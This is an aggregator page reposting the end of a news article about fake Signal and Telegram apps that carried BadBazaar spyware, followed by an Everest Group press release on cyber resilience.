This campaign marks an unprecedented attempt to snoop on some of the most popular messaging apps in the world. Both malicious apps were built on open-source code available from Signal and Telegram. Within that code, hackers stealthily wove in the espionage tool tracked as BadBazaar, a Trojan used in previous attacks targeting Uyghurs and other Turkic ethnic minorities. ESET told the outlet it suspects the China-aligned hacking group known as GREF is behind the campaign.

“BadBazaar’s main purpose is to exfiltrate device information, the contact list, call logs, and the list of installed apps, and to conduct espionage on Signal messages by secretly linking the victim’s Signal Plus Messenger app to the attacker’s device,” security researcher Lukáš Štefanko said in an interview with The Hacker News.

In a statement to Forbes this week, Signal president Meredith Whittaker said the company was “deeply concerned for anyone who trusted and downloaded this app.” She praised Google for removing “this pernicious malware masquerading as Signal off their platform,” and urged Samsung to follow suit, which it has since.

This content was originally published here.

Fake Signal and Telegram apps sneak malware into thousands of Android phones — delete these right now | Tom’s Guide Read More »

Everest Group Research: C-Suite Must Recognize Critical Difference Between Cybersecurity and Cyber Resilience

Everest Group Research: C-Suite Must Recognize Critical Difference Between Cybersecurity and Cyber Resilience

DALLAS, Aug. 29, 2023 /PRNewswire-PRWeb/ — Everest Group is calling on enterprises to make the critical shift in focus from cybersecurity to cyber resilience. While cybersecurity focuses on safeguarding against threats, cyber resilience emphasizes the ability to withstand, respond and recover quickly from them.

Everest Group issues this call to action in its recently published “State of the Market Report” on cybersecurity services. The report focuses on differentiating cybersecurity from cyber resilience, emphasizing that these two concepts are often mistakenly considered synonymous in the business world.

“Cybersecurity is just one component of cyber resilience, but, unfortunately, many enterprises fail to understand the subtle difference,” said Kumar Avijit, practice director of Information Technology Services at Everest Group. “While a majority of C-suite executives concentrate on preventive controls and response, equal importance needs to be allocated to the recovery, revamp, and reinforcement stages of cyber resilience. For any business, having a comprehensive cyber resilience strategy is critical in safeguarding long-term viability and success.”

Everest Group rates current C-suite focus on the “5 Rs of cyber resilience” as follows:

These findings and more are detailed in Everest Group’s recently published report, “Cybersecurity Services State of the Market Report 2023: Cyber Secure to Cyber Resilient.” Download a complimentary abstract here.

The report provides an in-depth analysis of the global cybersecurity market, with special sections on North America and Europe. In addition, the report introduces a unique and easily understandable framework to assist enterprises, particularly the C-suite, in swiftly incorporating cyber resilience into their operations. Additionally, the report explores the implications for providers in key areas such as solutions, services, partnerships, talent, and engagement models, illustrating how they can enable enterprises to adopt cyber resilience.

Selected Highlights:

About Everest Group 

Everest Group is a leading research firm helping business leaders make confident decisions. We guide clients through today’s market challenges and strengthen their strategies by applying contextualized problem-solving to their unique situations. This drives maximized operational and financial performance and transformative experiences. Our deep expertise and tenacious research focused on technology, business processes, and engineering through the lenses of talent, sustainability, and sourcing delivers precise and action-oriented guidance. Find further details and in-depth content at http://www.everestgrp.com.

This content was originally published here.

Everest Group Research: C-Suite Must Recognize Critical Difference Between Cybersecurity and Cyber Resilience Read More »

Scroll to Top